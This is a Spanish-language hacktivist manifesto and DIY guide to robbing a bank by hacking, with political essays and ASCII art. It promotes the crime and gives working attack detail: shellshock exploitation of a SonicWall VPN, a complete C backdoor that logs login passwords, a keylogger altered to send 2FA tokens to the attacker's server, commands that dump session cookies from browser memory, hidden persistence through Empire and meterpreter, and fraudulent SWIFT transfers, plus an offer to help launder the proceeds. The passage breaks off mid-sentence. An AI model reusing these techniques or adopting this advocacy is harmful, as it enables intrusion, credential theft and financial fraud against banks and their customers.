_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
Una guia DIY para robar bancos
^__^
(oo)\_______
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
`'
Por el Subcowmandante Marcos
Soy un nino salvaje
Inocente, libre, silvestre
Tengo todas las edades
Mis abuelos viven en mi
Soy hermano de las nubes
Y solo se compartir
Se que todo es de todos
que todo esta vivo en mi
Mi corazon es una estrella
Soy hijo de la tierra
Viajo a bordo de mi espiritu
Camino a la eternidad
Esta es mi palabra sencilla que busca tocar el corazon de la gente simple y
humilde, pero tambien digna y rebelde. Esta es mi palabra sencilla para contar
de mis hackeos, y para invitar a otras personas a que hackeen con alegre
rebeldia.
Hackee un banco. Lo hice para dar una inyeccion de liquidez, pero esta vez desde
abajo y a la gente simple y humilde que resiste y se rebela contra las
injusticias en todo el mundo. En otras palabras: robe un banco y regale el
dinero. Pero no fui yo sola quien lo hizo. El movimiento del software libre, la
comunidad del powershell ofensivo, el proyecto metasploit y la comunidad hacker
en general son las que posibilitaron este hackeo. La comunidad de exploit.in
hizo posible convertir la intrusion en las computadoras de un banco en efectivo
y bitcoin. Los proyectos Tor, Qubes y Whonix, junto a las y los criptografos y
activistas que defienden la privacidad y el anonimato, son mis nahuales, es
decir, mis protectores [1]. Me acompanan cada noche y hacen posible que siga en
libertad.
No hice nada complicado. Solamente vi la injusticia en este mundo, senti amor
por todos los seres, y exprese ese amor de la mejor forma que pude, mediante las
herramientas que se usar. No me mueve el odio a los bancos, ni a los ricos, sino
un amor por la vida, y el deseo de un mundo donde cada quien pueda realizar su
potencial y vivir una vida plena. Quisiera explicar un poco como veo el mundo,
para que puedan hacerse una idea de como es que llegue a sentirme y actuar asi.
Y espero tambien que esta guia sea una receta que puedan seguir, combinando los
mismos ingredientes para hornear el mismo bizcocho. Quien sabe, por ahi estas
herramientas tan potentes acaban sirviendoles tambien a ustedes para expresar el
amor que sienten.
Todos somos ninos salvajes
inocentes, libres, silvestres
Todos somos hermanos de los arboles
hijos de la tierra
Solo tenemos que poner en nuestro corazon
una estrella encendida
(cancion de Alberto Kuselman y Chamalu)
La policia va a invertir un chingo de recursos en investigarme. Creen que el
sistema funciona, o al menos que funcionara una vez que atrapen a todos los
"chicos malos". No soy mas que el producto de un sistema que no funciona.
Mientras existan la injusticia, la explotacion, la alienacion, la violencia y la
destruccion ecologica, vendran muchas mas como yo: una serie interminable de
personas que rechazaran por ilegitimo el mal sistema responsable de este
sufrimiento. Ese sistema mal hecho no se va a componer arrestandome. Soy
solamente una de las millones de semillas que Tupac planto hace 238 anos en La
Paz [2], y espero que mis acciones y escritos rieguen la semilla de la rebelion
en sus corazones.
[1]
https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
[2] fue antes de ser asesinado por los espanoles, justo un dia como ayer, que
dijo eso de "a mi solo me mataran, pero manana volvere y sere millones".
____________________________________________
< Para que nos vieran, nos tapamos el rostro >
--------------------------------------------
\
\ ^__^
(oo)\_______
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
`'
Para hacernos escuchar, a lxs hackers a veces nos toca taparnos la cara, porque
no nos interesa que vean nuestro rostro sino que entiendan nuestra palabra. La
mascara puede ser de Guy Fawkes, de Salvador Dali, de Fsociety, o en algun caso
la marioneta de un sapo con cresta. Por afinidad, esta vez fui a desenterrar a
un difunto para prestarme su pasamontanas. Creo entonces que deberia aclarar que
el Sup Marcos es inocente de todo lo que aqui se cuenta porque, ademas de estar
muerto, no le consulte. Espero que su fantasma, si se entera desde alguna hamaca
chiapaneca, sepa encontrar la bondad para, como dicen alla, "desestimar este
deep fake" con el mismo gesto con que se aleja un insecto inoportuno - que bien
podria ser un escarabajo.
Aun asi con el pasamontanas y el cambio de nombre, muchos de los que apoyan mis
acciones quizas van a prestar demasiada atencion a mi persona. Con su propia
autonomia hecha trizas por una vida entera de dominacion, estaran buscando un
lider a seguir, o una heroina que les salve. Pero detras del pasamontanas solo
soy una nina. Todos somos ninos salvajes. Nos so temos que colocar uma estrela
em chamas em nossos coracoes.
--[ 1 - Por que expropiar ]-----------------------------------------------------
El capitalismo es un sistema en el que una minoria se ha venido a apropiar de
una vasta mayoria de los recursos del mundo a traves de la guerra, el hurto y
la explotacion. Al arrebatarnos los comunes [1], forzaron a los de abajo a
estar bajo el control de esa minoria que todo lo posee. Es un sistema
fundamentalmente incompatible con la libertad, la igualdad, la democracia y el
Suma Qamana (Buen Vivir). Puede sonar ridiculo para las que hemos crecido en una
maquinaria propagandistica que nos enseno que capitalismo es libertad, pero en
verdad esto que digo no es una idea nueva ni controvertida [2]. Los fundadores
de los Estados Unidos de America sabian que tenian que elegir entre crear una
sociedad capitalista, o una libre y democratica. Madison reconocia que "el
hombre que posee riqueza, el que se acuesta en su sofa o rueda en su carruaje,
no puede juzgar los deseos o sentimientos del jornalero". Pero para protegerse
frente al "espiritu de equiparacion" de los jornaleros sin tierra, le parecio
que solamente los terratenientes debian votar, y que el gobierno tenia que
servir para "proteger a la minoria opulenta frente a la gran mayoria". John
Jay fue mas al grano y dijo: "Aquellos que son duenos del pais deberian
gobernarlo".
____________________________________________________
/ No existe eso que llaman capitalismo verde. \
| Hagamos al capitalismo historia antes de que nos |
\ convierta en historia. /
----------------------------------------------------
\ /\ ___ /\
\ // \/ \/ \\
(( O O ))
\\ / \ //
\/ | | \/
| | | | Evgeny, el gran elefante ignorado, no entiende por que todos
| | | | fingen no verle en los paneles sobre cambio climatico, asi
| o | que aqui le doy chance a decir sus lineas.
| | | |
|m| |m|
De la misma forma que bell hooks [3] sostiene que el rechazo a la cultura
patriarcal de dominacion es un acto en defensa del propio interes del varon (ya
que emocionalmente les mutila y evita que sientan amor y conexion de forma
plena), creo que la cultura de dominacion del capitalismo tiene un efecto
similar sobre los ricos, y que podrian tener vidas mas plenas y satisfactorias
si rechazaran el sistema de clases del que creen que se benefician. Para muchos,
el privilegio de clase equivale a una infancia de negligencia emocional, seguida
de una vida de interacciones sociales superficiales y trabajo sin sentido. Puede
que en el fondo sepan que solo pueden conectar de forma genuina con las personas
cuando trabajan con ellas como sus iguales, y no cuando las ponen a su servicio.
Puede que sepan que compartir su riqueza material es lo mejor que pueden hacer
con ella. Quizas sepan tambien que las experiencias significativas, las
conexiones y las relaciones que cuentan no son las que provienen de las
interacciones mercantiles, sino precisamente de rechazar la logica del mercado
y dar sin esperar nada a cambio. Tal vez sepan que todo lo que necesitan para
escapar de su prision y vivir de verdad es dejarse llevar, ceder el control, y
dar un salto de fe. Pero a la mayoria les falta valentia.
Entonces seria ingenuo por nuestra parte dirigir nuestros esfuerzos a tratar de
producir alguna clase de despertar espiritual en los ricos [4]. Como dice Assata
Shakur: "Nadie en el mundo, nadie en la historia, ha conseguido nunca su
libertad apelando al sentido moral de sus opresores". En realidad, cuando los
ricos reparten su dinero, casi siempre lo hacen de un modo que refuerza el
sistema que para empezar les permitio amasar sus enormes e ilegitimas riquezas
[5]. Y es poco probable que el cambio venga a traves de un proceso politico;
como dice Lucy Parsons: "No nos dejemos nunca enganar con que los ricos nos
vayan a dejar votar para arrebatarles sus riquezas". Colin Jenkins justifica la
expropiacion con estas palabras [6]:
No nos equivoquemos, la expropiacion no es robo. No es la confiscacion de
dinero ganado "con el sudor de la frente". No es el robo de propiedad
privada. Es, mas bien, la recuperacion de enormes cantidades de tierra y
riqueza que han sido forjadas con recursos naturales robados, esclavitud
humana, fuerza de trabajo forzada y amasada en cientos de anos por una
pequena minoria. Esta riqueza... es ilegitima, tanto a efectos morales como
en tanto a los mecanismos de explotacion que se han empleado para crearla.
Para Colin, el primer paso es que "tenemos que liberarnos de nuestras ataduras
mentales (al creer que la riqueza y la propiedad privada han sido ganadas por
quienes las monopolizan; y que, por tanto, deberian ser algo a respetar,
reverenciar, e incluso algo a perseguir), abrir nuestras mentes, estudiar y
aprender de la historia, y reconocer juntos esta ilegitimidad". Aca les dejo
algunos libros que me han ayudado con esto [7][8][9][10][11].
Segun Barack Obama, la desigualdad economica es "el desafio que define a nuestro
tiempo". El hacking informatico es una herramienta poderosa para combatir la
desigualdad economica. El antiguo director de la NSA, Keith Alexander, concuerda
y dice que el hacking es responsable de "la mayor transferencia de riqueza de la
historia".
_________________________
/ La historia es nuestra \
\ y la hacen lxs hackers! /
-------------------------
\
\ ^__^
(oo)\_______
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
`'
!Allende presente, ahora y siempre!
[1]
https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf
[2]
https://chomsky.info/commongood02/
[3] The Will to Change: Men, Masculinity, and Love
[4] su propia religion ya es muy clara al respecto:
https://dailyverses.net/es/materialismo
[5]
https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/
[6]
http://www.hamptoninstitution.org/expropriation-or-bust.html
[7] Manifiesto por una Civilizacion Democratica. Volumen 1, Civilizacion: La Era
de los Dioses Enmascarados y los Reyes Cubiertos
[8] Caliban y la Bruja
[9] En deuda: Una historia alternativa de la economia
[10] La otra historia de los Estados Unidos
[11] Las venas abiertas de America Latina
_________________________________
< Nuestra arma es nuestro teclado >
---------------------------------
\
\ ^__^
(oo)\_______
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
`' ^^ ^^
--[ 2 - Introduccion ]----------------------------------------------------------
Esta guia explica como fue que hice el hackeo al Cayman Bank and Trust Company
(Isla de Man). ?Por que estoy publicando esto, casi cuatro anos despues?
1) Para mostrar lo que es posible
Los hackers que trabajan por el cambio social se han limitado a desarrollar
herramientas de seguridad y privacidad, DDoS, realizar defaceos y filtraciones.
Alla por donde vayas hay proyectos radicales por un cambio social en completo
estado de precariedad, y seria mucho lo que podrian hacer con un poco de dinero
expropiado. Al menos para la clase trabajadora, el robo de un banco es algo
socialmente aceptado, y a los que lo hacen se les ve como heroes del pueblo. En
la era digital, robar un banco es un acto no violento, menos arriesgado, y la
recompensa es mayor que nunca. Entonces ?por que son solamente los hackers de
sombrero negro que lo hacen para beneficio personal de ellos, y nunca los
hacktivistas para financiar proyectos radicales? Quizas no se creen que son
capaces de hacerlo. Los grandes hackeos bancarios salen en los noticieros cada
tanto, como el hackeo al Banco de Bangladesh [1], que fue atribuido a Corea del
Norte, o los hackeos a bancos atribuidos al grupo Carbanak [2], al que describen
como un grupo muy grande y bien organizado de hackers rusos, con distintos
miembros que estarian especializados en diferentes tareas. Y, pues no es tan
complicado.
Es por nuestra creencia colectiva en que el sistema financiero es incuestionable
que ejercemos control sobre nosotras mismas, y mantenemos el sistema de clases
sin que los de arriba tengan que hacer nada [3]. Poder ver como de vulnerable y
fragil es en realidad el sistema financiero nos ayuda a romper esa alucinacion
colectiva. Por eso los bancos tienen un fuerte incentivo para no reportar los
hackeos, y para exagerar como de sofisticados son los atacantes. Ninguno de los
hackeos financieros que hice, o de los que he sabido, ha sido nunca reportado.
Este va a ser el primero, y no porque el banco quisiera, sino porque yo me
decidi a publicarlo.
Como estas a punto de aprender en esta guia casera, hackear un banco y
transferir los dineros a traves de la red SWIFT no requiere del apoyo de ningun
gobierno, ni de un grupo grande y especializado. Es algo totalmente posible
siendo un mero hacker aficionado y del monton, con tan solo herramientas
publicas y conocimientos basicos de como se escribe un script.
[1]
https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html
[2]
https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak/67508/
[3]
https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural
2) Ayudar a retirar el efectivo
Muchos de los que lean esto ya tienen, o con un poco de estudio van a ser
capaces de adquirir, las habilidades necesarias para llevar a cabo un hackeo
como este. Sin embargo, muchos se van a encontrar con que les faltan las
conexiones criminales necesarias para sacar los mangos en condiciones. En mi
caso, este era el primer banco que hackeaba, y en ese momento solo tenia unas
pocas y mediocres cuentas preparadas para poder retirar el efectivo (conocidas
como bank drops), asi que solamente fueron unos cuantos cientos de miles los que
pude retirar en total, cuando lo normal es sacar millones. Ahora, en cambio, si
que tengo el conocimiento y las conexiones para sacar efectivo mas en serio, de
modo que si se encuentran hackeando un banco pero necesitan ayuda para convertir
eso en dinero de a de veras, y quieren usar esa lana para financiar proyectos
sociales radicales, se ponen en contacto conmigo.
3) Colaborar
Es posible hackear bancos como una aficionada que trabaja en solitario, pero la
neta es que, por lo general, no es tan facil como lo pinto aca. Tuve suerte con
este banco por varias razones:
1) Era un banco pequeno, por lo que me tomo mucho menos tiempo llegar a
comprender como funcionaba todo.
2) No tenian ningun procedimiento para revisar los mensajes swift enviados.
Muchos bancos tienen uno, y necesitas escribir codigo para esconder tus
transferencias de su sistema de monitorizacion.
3) Solo usaban autenticacion por contrasena para acceder a la aplicacion con la
que se conectaban a la red SWIFT. La mayoria de los bancos ahora usan RSA
SecurID, o alguna forma de 2FA. Puedes saltarte esto escribiendo codigo para
recibir una alerta cuando entren su token, y asi poder usarlo antes de que
expire. Es mas sencillo de lo que parece: he usado Get-Keystrokes [1],
modificandolo para que en vez de almacenar las teclas pulsadas, se haga una
peticion GET a mi servidor cada vez que se detecta que han introducido un
nombre de usuario. Esta peticion anade el nombre de usuario a la url y,
conforme tipean el token, se hacen varios GET con los digitos del token
concatenados a la url. En mi lado dejo esto corriendo mientras tanto:
ssh yo@mi_servidor_secreto 'tail -f /var/log/apache2/access_log'
| while read i; do echo $i; aplay alarma.wav &> /dev/null; done
Si es una aplicacion web, puedes saltarte el 2FA robandoles la cookie
despues de que se hayan autenticado. No soy un APT con un equipo de coders
que puedan hacerme herramientas a medida. Soy una persona sencilla que vive
de lo que le da la terminal [2], de modo que lo que uso es:
procdump64 /accepteula -r -ma PID_del_browser
strings64 /accepteula *.dmp | findstr PHPSESSID 2> nul
o pasandolo por findstr antes que por strings, lo que lo hace mucho mas
rapido:
findstr PHPSESSID *.dmp > tmp
strings64 /accepteula tmp | findstr PHPSESSID 2> nul
Otra forma de saltartelo es accediendo a su sesion con un VNC oculto (hvnc)
despues de que se hayan autenticado, o con un poco de creatividad tambien
podrias enfocarte en otra parte de su proceso en lugar de enviar mensajes
SWIFT directamente.
Creo que si colaborase con otros hackers bancarios con experiencia podriamos
hacernos cientos de bancos como Carnabak, en vez de estar haciendo uno de tanto
en tanto por mi cuenta. Asi que si tienes experiencia con hackeos similares y
quieres colaborar, contactame. Encontraras mi correo y mi llave PGP al final de
la guia anterior [3].
[1]
https://github.com/PowerShellMafia/PowerSploit/blob/master/
Exfiltration/Get-Keystrokes.ps1
[2]
https://lolbas-project.github.io/
[3]
https://www.exploit-db.com/papers/41914
________________________________________
/ Si robar un banco cambiara las cosas, \
\ lo harian ilegal /
----------------------------------------
\
\ ^__^
(oo)\_______
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
`'
--[ 3 - Tengan cuidado ahi fuera ]----------------------------------------------
Es importante tomar algunas precauciones sencillas. Voy a remitirme a esta
misma seccion de mi ultima guia [1], ya que por lo visto funciona bien nomas
[2]. Todo lo que tengo que anadir es que, en palabras de Trump, "A menos que
atrapes a los hackers in fraganti, es rete-dificil determinar quien es que
estaba realizando el hackeo", de modo que la policia se esta volviendo mas y mas
creativa [3][4] en sus intentos de agarrar a los criminales en el acto (cuando
sus discos duros cifrados estan desbloqueados). Asi que estaria bueno si por
ejemplo llevas encima un cierto dispositivo bluetooth y configuras tu
computadora para que se apague cuando se aleje mas alla de un cierto rango, o
cuando un acelerometro detecta movimiento, o algo por el estilo.
Puede que escribir articulos largos detallando tus acciones y tu ideologia no
sea la cosa mas segura del mundo (!ups!), pero a ratos siento que tenia que
hacerlo.
Si no creyera en quien me escucha
Si no creyera en lo que duele
Si no creyera en lo que quede
Si no creyera en lo que lucha
Que cosa fuera...
?Que cosa fuera la maza sin cantera?
[1]
https://www.exploit-db.com/papers/41914
[2]
https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar-a-
phineas-fisher.html
[3]
https://www.wired.com/2015/05/silk-road-2/
[4]
https://motherboard.vice.com/en_us/article/59wwxx/fbi-airs-alexandre-cazes-
alphabay-arrest-video
,-\__
|f-"Y\ ____________________
\()7L/ | !Se gay! |
cgD | !Haz el crimen! | __ _
|\( --------------------- .' Y '>,
\ \ \ / _ _ \
\\\ \ )(_) (_)(|}
\\\ { 4A } /
\\\ \uLuJJ/\l
\\\ |3 p)/
\\\___ __________ /nnm_n//
c7___-__,__-)\,__)(". \_>-<_/D
//V \_"-._.__G G_c__.-__<"/ ( \
<"-._>__-,G_.___)\ \7\
("-.__.| \"<.__.-" ) \ \
|"-.__"\ |"-.__.-".\ \ \
("-.__"". \"-.__.-".| \_\
\"-.__""|!|"-.__.-".) \ \
"-.__""\_|"-.__.-"./ \ l
".__""">G>-.__.-"> .--,_
"" G
Muchos culpan a las personas queer del declive de esta sociedad;
estamos orgullosxs de ello
Algunos creen que queremos reducir a cenizas
esta civilizacion y su tejido moral;
No podrian estar mas en lo cierto
Con frecuencia nos describen como depravadxs, decadentes y revoltosxs
Pero !ay! No han visto nada todavia
https://theanarchistlibrary.org/library/mary-nardini-gang-be-gay-do-crime
--[ 4 - Conseguir acceso ]------------------------------------------------------
En otro lugar [1] les platicaba acerca de las vias principales para conseguir
acceso inicial a la red de una compania durante un ataque dirigido. Sin embargo,
este no era un ataque dirigido. No me propuse hackear un banco especifico, lo
que queria era hackear cualquier banco, lo cual termina siendo una tarea mucho
mas sencilla. Este tipo de enfoque inespecifico fue popularizado por Lulzsec y
Anonymous [2]. Como parte de [1], prepare un exploit y unas herramientas de
post-explotacion para un dispositivo de VPN popular. Luego me puse a escanear la
internet entera con zmap [3] y zgrab para identificar otros dispositivos
vulnerables. Hice que el escaner guardara las IPs vulnerables, junto con el
"common name" y los "alt names" del certificado SSL del dispositivo, los nombres
de dominio de windows del dispositivo, y la busqueda DNS inversa de la IP. Le
hice un grep al resultado en busca de la palabra "banco", y habia bastante para
elegir, pero la verdad es que me atrajo la palabra "Cayman", y fue asi que vine
a quedarme con este.
[1]
https://www.exploit-db.com/papers/41914
[2]
https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
[3]
https://github.com/zmap/zmap
----[ 4.1 - El Exploit ]--------------------------------------------------------
Cuando publique mi ultima guia DIY [1] no revele los detalles del exploit de
sonicwall que habia usado para hackear a Hacking Team, ya que era muy util para
otros hackeos, como este mismo, y todavia no habia acabado de divertirme con el.
Determinada entonces a hackear a Hacking Team, pase semanas haciendo ingenieria
inversa a su modelo del ssl-vpn de sonicwall, e incluso consegui encontrar
varias vulnerabilidades de corrupcion de memoria mas o menos dificiles de
explotar, antes de darme cuenta de que el dispositivo era facilmente explotable
con shellshock [2]. Cuando salio shellshock, muchos dispositivos sonicwall eran
vulnerables, solo con una peticion a cgi-bin/welcome, y un payload en el
user-agent. Dell saco una actualizacion de seguridad y un advisory para estas
versiones. La version usada por Hacking Team y este banco tenia la version de
bash vulnerable, pero las peticiones cgi no disparaban el shellshock excepto por
las peticiones a un shell script, y justo habia uno accesible:
cgi-bin/jarrewrite.sh. Esto parece que se les escapo a los de Dell en su nota,
ya que nunca sacaron una actualizacion de seguridad ni un advisory para esa
version del sonicwall. Y, amablemente, Dell habia hecho dos2unix setuid root,
dejando un dispositivo facil de rootear.
En mi ultima guia muchos leyeron que pase semanas investigando un dispositivo
hasta dar con un exploit, y asumieron que eso significaba que yo era algun tipo
de hacker de elite. La realidad, es decir, el hecho de que me llevo dos semanas
darme cuenta de que era trivialmente explotable con shellshock, es tal vez menos
halagadora para mi, pero pienso que tambien es mas inspiradora. Demuestra que
de verdad tu puedes hacer esto por ti misma. No necesitas ser un genio, yo
ciertamente no lo soy. En realidad mi trabajo contra Hacking Team comenzo un
ano antes. Cuando descubri a Hacking Team y al Grupo Gamma en las
investigaciones de CitizenLab [3][4], decidi explorar un poco y ver si podia
encontrar algo. No llegue a ninguna parte con Hacking Team, pero tuve suerte con
Gamma Group, y pude hackear su portal de atencion al cliente con inyeccion sql
basica y vulnerabilidades de subida de archivos [5][6]. Sin embargo, a pesar de
que su servidor de soporte me daba un pivote hacia la red interna de Gamma
Group, fui incapaz de penetrar mas alla en la compania. A partir de esta
experiencia con el Grupo Gamma y otros hacks, me di cuenta de que estaba
realmente limitada por mi falta de conocimiento sobre escalada de privilegios y
movimiento lateral en dominios windows, active directory y windows en general.
Asi que estudie y practique (ver seccion 11), hasta que senti que estaba lista
para volver a hacerle una visita a Hacking Team casi un ano despues. La practica
dio sus frutos, y esa vez fui capaz de realizar un compromiso completo de la
compania [7]. Antes de darme cuenta de que podia entrar con shellshock, estaba
dispuesta a pasar meses enteros feliz de la vida estudiando desarrollo de
exploits y escribiendo un exploit confiable para una de las vulnerabilidades de
corrupcion de memoria que habia encontrado. Solo sabia que Hacking Team
necesitaba ser expuesto, y que me tomaria tanto tiempo como fuese necesario y
aprenderia lo que tuviese que aprender para conseguirlo. Para realizar estos
hacks no necesitas ser brillante. Ni siquiera necesitas un gran conocimiento
tecnico. Solo necesitas dedicacion, y creer en ti misma.
[1]
https://www.exploit-db.com/papers/41914
[2]
https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
[3]
https://citizenlab.ca/tag/hacking-team/
[4]
https://citizenlab.ca/tag/finfisher/
[5]
https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-
bahrain-track-arab-spring-protesters/
[6]
https://www.exploit-db.com/papers/41913
[7]
https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam
----[ 4.2 - El Backdoor ]-------------------------------------------------------
Parte del backdoor que prepare para Hacking Team (vease [1], seccion 6) era un
wrapper sencillo sobre la pagina de login para capturar contrasenas:
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
int main()
{
char buf[2048];
int nread, pfile;
/* jala el log si mandamos una cookie especial */
char *cookies = getenv("HTTP_COOKIE");
if (cookies && strstr(cookies, "nuestra contrasena privada")) {
write(1, "Content-type: text/plain\n\n", 26);
pfile = open("/tmp/.pfile", O_RDONLY);
while ((nread = read(pfile, buf, sizeof(buf))) > 0)
write(1, buf, nread);
exit(0);
}
/* el principal almacena los datos del POST y se los envia al hijo,
que es el programa de login real */
int fd[2];
pipe(fd);
pfile = open("/tmp/.pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
if (fork()) {
close(fd[0]);
while ((nread = read(0, buf, sizeof(buf))) > 0) {
write(fd[1], buf, nread);
write(pfile, buf, nread);
}
write(pfile, "\n", 1);
close(fd[1]);
close(pfile);
wait(NULL);
} else {
close(fd[1]);
dup2(fd[0],0);
close(fd[0]);
execl("/usr/src/EasyAccess/www/cgi-bin/.userLogin",
"userLogin", NULL);
}
}
En el caso de Hacking Team, se logueaban a la VPN con passwords de un solo uso,
de modo que la VPN me dio acceso solamente a la red, y a partir de ahi me tomo
un esfuerzo extra conseguir admin de dominio en su red. En la otra guia escribi
sobre pases laterales y escalada de privilegios en dominios windows [1]. En este
caso, en cambio, eran las mismas contrasenas de dominio de windows las que se
usaban para autenticarse contra la VPN, asi que pude conseguir un buen de
contrasenas de usuarios, incluyendo la del admin de dominio. Ahora tenia total
acceso a su red, pero usualmente esta es la parte facil. La parte mas complicada
es entender como es que operan y como sacar el pisto.
[1]
https://www.exploit-db.com/papers/41914
----[ 4.3 - Datos curiosos ]----------------------------------------------------
Al seguir la investigacion que hicieron sobre el hackeo, me resulto interesante
ver que, por la misma epoca en que yo lo hice, el banco pudo haber sido
comprometido por alguna otra persona mediante un email de phishing dirigido [1].
Como dice el viejo dicho, "dale a una persona un exploit y tendra acceso por un
dia, ensenale a phishear y tendra acceso toda su vida" [2]. El hecho de que
alguien mas, por casualidad y al mismo tiempo que yo, se pusiera este banco
pequeno en la mira (registraron un dominio similar al dominio real del banco
para poder enviar el phishing desde ahi) hace pensar que los hackeos bancarios
ocurren con mucha mas frecuencia de lo que se conoce.
Una sugerencia divertida para que puedas seguir las investigaciones de tus
hackeos es tener un acceso de respaldo, uno que no vas a tocar a menos que
pierdas el acceso normal. Tengo un script sencillo que espera comandos una
vez al dia, o menos, solo para mantener acceso a largo plazo en el caso de
que bloqueen mi acceso regular. Luego tenia un powershell empire [3]
llamando a casa con mas frecuencia a una IP diferente, y usaba empire para
lanzar meterpreter [4] contra una tercera IP, donde realizaba la mayor parte de
mi trabajo. Cuando PWC se puso a investigar el hackeo, encontraron mi uso de
empire y meterpreter y limpiaron esas computadoras y bloquearon esas IPs, pero
no detectaron mi acceso de respaldo. PWC habia colocado dispositivos de
monitoreo de red, para poder analizar el trafico y ver si todavia habia
computadoras infectadas, de modo que no queria conectarme mucho a su red. Solo
lance mimikatz una vez para obtener las nuevas contrasenas, y a partir de ahi
pude seguir sus investigaciones leyendo sus correos en el outlook web access.
[1] pagina 47, Project Pallid Nutmeg.pdf, en torrent
[2]
https://twitter.com/thegrugq/status/563964286783877121
[3]
https://github.com/EmpireProject/Empire
[4]
https://github.com/rapid7/metasploit-framework
--[ 5 - Entender las Operaciones Bancarias ]------------------------------------
Para entender como operaba el banco, y como podria sacar dinero, segui las
tecnicas que resumi en [1], en la seccion "13.3 - Reconocimiento Interno".
Descargue una lista de todos los nombres de archivos, le hice un grep en busca
de palabras como "SWIFT" y "transferencia", y descargue y lei todos los
archivos con nombres interesantes. Tambien busque correos de empleados, pero de
lejos la tecnica mas util fue usar keyloggers y capturas de pantalla para
observar como trabajaban los empleados del banco. No lo sabia por entonces, pero
para esto windows trae una herramienta buenisima de monitoreo [2]. Como se
describe en la tecnica no. 5 del apartado 13.3 en [1], hice una captura de las
teclas pulsadas en todo el dominio (incluyendo los titulos de ventana), hice un
grep en busca de SWIFT, y encontre algunos empleados abriendo 'SWIFT Access
Service Bureau - Logon'. Para esos empleados, corri meterpreter como en [3], y
use el modulo post/windows/gather/screen_spy para tomar capturas de pantalla
cada 5 segundos, para observar como es que trabajaban. Estaban usando una app
citrix remota de la compania bottomline [4] para acceder a la red SWIFT, donde
cada mensaje de pago SWIFT MT103 tenia que pasar a traves de tres empleados: uno
para "crear" el mensaje, uno para "verificarlo", y otro para "autorizarlo". Como
ya tenia todas sus credenciales gracias al keylogger, pude realizar con
facilidad los tres pasos yo misma. Y por lo que sabia despues de haberles visto
trabajar, no revisaban los mensajes SWIFT enviados, de modo que deberia tener
suficiente tiempo para sacar el dinero de mis bank drops antes de que el banco
se diera cuenta e intentara revertir las transferencias.
[1]
https://www.exploit-db.com/papers/41914
[2]
https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-
remotely-with-metasploit/
[3]
https://www.trustedsec.com/blog/no_psexec_needed/
[4]
https://www.bottomline.com/uk/products/bottomline-swift-access-services
_________________________________________
/ Quien roba a un ladron, tiene cien anos \
\ de perdon. /
-----------------------------------------
\
\ ^__^
(oo)\_______
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
`'
--[ 6 - Enviar el dinero ]------------------------------------------------------
No tenia mucha idea de lo que estaba haciendo, asi que lo iba descubriendo
por el camino. De algun modo, las primeras transferencias que envie salieron
bien. Al dia siguiente, la cague enviando una transferencia a mexico que puso
fin a mi diversion. Este banco enviaba sus transferencias internacionales
a traves de su cuenta corresponsal en Natwest. Habia visto que la cuenta
corresponsal para las transferencias en libras esterlinas (GBP) aparecia como
NWBKGB2LGPL, mientras que para las demas era NWBKGB2LXXX. La transferencia
mexicana estaba en GBP, asi que asumi que tenia que poner NWBKGB2LGPL como
corresponsal. Si lo hubiera preparado mejor habria sabido que el GPL en lugar de
XXX senalaba que el pago se enviaria a traves del Servicio de Pagos Rapidos del
Reino Unido, en lugar de como una transferencia internacional, lo que obviamente
pues no va a funcionar cuando estas tratando de enviar dinero a mexico. Asi que
al banco le llego un mensaje de error. El mismo dia tambien trate de enviar un
pago de _200k a UK usando NWBKGB2LGPL, que no se hizo porque 200k sobrepasaba el
limite de envio mediante pagos rapidos, y hubiera tenido que usar NWBKGB2LXXX en
vez. Tambien recibieron un mensaje de error por esto. Leyeron los mensajes, lo
investigaron, y encontraron el resto de mis transferencias.
--[ 7 - El botin ]--------------------------------------------------------------
Por lo que escribo ya se haran una nocion cabal de cuales son mis ideales y a
que cosas les doy mi apoyo. Pero no quisiera ver a nadie en problemas legales
por recibir fondos expropiados, asi que ni una palabra mas de para donde se
fue la lana. Se que los periodistas probablemente van a querer poner algun
numero sobre cuantos dolares fueron distribuidos en este hackeo y otros
parecidos, pero prefiero no alentar nuestro perverso habito de medir las
acciones nomas por su valor economico. Cualquier accion es admirable si es que
viene desde el amor y no desde el ego. Por desgracia los de arriba, los ricos y
poderosos, las figuras publicas, los hombres de negocios, la gente en posiciones
"importantes", aquellos que nuestra sociedad mas respeta y valora, esos se han
colocado donde estan a base de actuar mas desde el ego que desde el amor. Es en
la gente sencilla, humilde e "invisible" en quien deberiamos fijarnos y a
quienes deberiamos admirar.
--[ 8 - Criptomonedas ]---------------------------------------------------------
Redistribuir dinero expropiado a proyectos chileros que buscan un cambio social
positivo seria mas facil y seguro si esos proyectos aceptaran donaciones
anonimas via criptomonedas como monero, zcash, o al menos bitcoin. Se entiende
que muchos de esos proyectos tengan una aversion a las criptomonedas, ya que
se parecen mas a alguna extrana distopia hipercapitalista que a la economia
social con la que sonamos. Comparto su escepticismo, pero pienso que resultan
utiles para permitir donaciones y transacciones anonimas, al limitar la
vigilancia y control gubernamentales. Igual que el efectivo, cuyo uso muchos
paises estan tratando de limitar por la misma razon.
--[ 9 - Powershell ]------------------------------------------------------------
En esta operacion, al igual en que en [1], hice mucho uso de powershell. Por
entonces, powershell era super cool, podias hacer casi cualquier cosa que
